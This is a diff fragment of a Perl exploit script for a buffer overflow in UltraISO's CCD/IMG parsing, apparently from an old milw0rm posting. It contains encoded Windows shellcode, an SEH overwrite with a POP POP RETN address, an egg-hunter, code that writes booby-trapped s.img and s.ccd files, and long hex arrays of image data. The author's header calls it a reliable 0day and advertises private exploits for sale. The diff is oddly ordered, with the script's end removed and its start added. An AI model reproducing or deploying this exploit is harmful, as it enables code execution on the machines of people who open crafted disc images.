-	        "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";
-
-# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
-"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x68".
-"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x78\x32\x42\x42\x32\x41".
-"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6d\x39\x6b\x4c\x6a".
-"\x48\x31\x54\x53\x30\x55\x50\x77\x70\x4c\x4b\x30\x45\x45\x6c\x4e".
-"\x6b\x71\x6c\x46\x65\x32\x58\x43\x31\x38\x6f\x4c\x4b\x62\x6f\x56".
-"\x78\x6c\x4b\x41\x4f\x41\x30\x45\x51\x7a\x4b\x37\x39\x6e\x6b\x74".
-"\x74\x4c\x4b\x34\x41\x38\x6e\x30\x31\x39\x50\x4f\x69\x6e\x4c\x4b".
-"\x34\x6b\x70\x53\x44\x66\x67\x4b\x71\x58\x4a\x34\x4d\x54\x41\x39".
-"\x52\x38\x6b\x6c\x34\x57\x4b\x32\x74\x41\x34\x34\x44\x74\x35\x7a".
-"\x45\x4c\x4b\x41\x4f\x41\x34\x44\x41\x6a\x4b\x61\x76\x4e\x6b\x36".
-"\x6c\x70\x4b\x4c\x4b\x43\x6f\x57\x6c\x63\x31\x58\x6b\x6e\x6b\x37".
-"\x6c\x6e\x6b\x66\x61\x38\x6b\x4c\x49\x31\x4c\x66\x44\x76\x64\x4b".
-"\x73\x47\x41\x59\x50\x50\x64\x4e\x6b\x77\x30\x30\x30\x4c\x45\x4b".
-"\x70\x70\x78\x44\x4c\x6c\x4b\x73\x70\x56\x6c\x6e\x6b\x72\x50\x47".
-"\x6c\x4c\x6d\x4c\x4b\x62\x48\x43\x38\x5a\x4b\x74\x49\x4c\x4b\x4f".
-"\x70\x6e\x50\x47\x70\x37\x70\x75\x50\x6e\x6b\x41\x78\x45\x6c\x31".
-"\x4f\x37\x41\x4c\x36\x61\x70\x36\x36\x4e\x69\x7a\x58\x4b\x33\x6b".
-"\x70\x63\x4b\x56\x30\x61\x78\x31\x6e\x4e\x38\x6d\x32\x72\x53\x55".
-"\x38\x4d\x48\x6b\x4e\x4e\x6a\x76\x6e\x32\x77\x59\x6f\x69\x77\x50".
-"\x63\x50\x61\x30\x6c\x65\x33\x56\x4e\x63\x55\x32\x58\x32\x45\x35".
-"\x50\x68";
-
-
-my $overflow1 = "\x41" x 10002;
-my $lookout   = "\x41" x 128;
-my $sehjmp    = "\xEB\x80\xFF\xFF";
-my $sehret    = "\x56\x38\x40\x00"; # 00403856 POP POP RETN
-my $shellhunter = "\x8b\xcc".
-		  "\xb8\x41\x41\x41\x41".
-		  "\x41".
-                  "\x36\x39\x01".
-                  "\x75\xf5".
-                  "\xff\xd1";
-my $len1 = 4091 - (length($shellcode) + 128 + 126) + 972; #Remove "+ 972" if you want the exploit to work if the CCD or IMG file are executed when passed as parameters to UltraISO.
-my $len2 = 126 - length($shellhunter);
-my $overflow2 = "\x42" x $len1;
-my $overflow3 = "\x41" x $len2;
-my $overflow4 = "\x43" x 5903;
-
-open (my $img_file, "> s.img"); #Important: IMG filename must be same as CCD filename.
-binmode $img_file;
-print $img_file $img_data1.
-		$overflow1.
-                $img_data2.
-                $overflow1.
-                $img_data3.
-                $overflow1.
-                $img_data4;
-close $img_file;
-open (my $ccd_file, "> s.ccd");
-print $ccd_file $ccd_data.
-		$lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4;
-close $ccd_file;
-
-# milw0rm.com [2009-04-03]
+#!/usr/bin/perl
+#
+# UltraISO <= 9.3.3.2685 CCD/IMG Universal Buffer Overflow Exploit
+# ----------------------------------------------------------------
+# Discovered and Exploited by SkD             (skdrat@hotmail.com)
+#
+# A nice exploit for this software that was just recently
+# patched after a few other discoveries in it.
+# This is 0day at the moment and is very reliable.
+#
+# Just open either file CCD or IMG in UltraISO :).
+#
+# Another note is that the CCD will also cause an access violation
+# in MagicISO.
+#
+# Private exploits for sale, contact me at (skdrat@hotmail.com).
+#
+# WARNING: Author has no responsibility over the damage done
+# with this!
+use strict;
+use warnings;
+
+my $img_data1 = "\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xC5\x13\x68\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF7\x00\xF5".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x52\x35\xB8\x7D\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x97\x26\xD0\x56".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2D\x17".
+	        "\x2E\x1B\xB1\x48\xB2\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x65\x00\xC2\x00\xE6\x00\x43\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x45\x3C\x53\x75\x33\x2B\x25\x62\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00\xC1\x00\x12\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x02\x01\x01".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
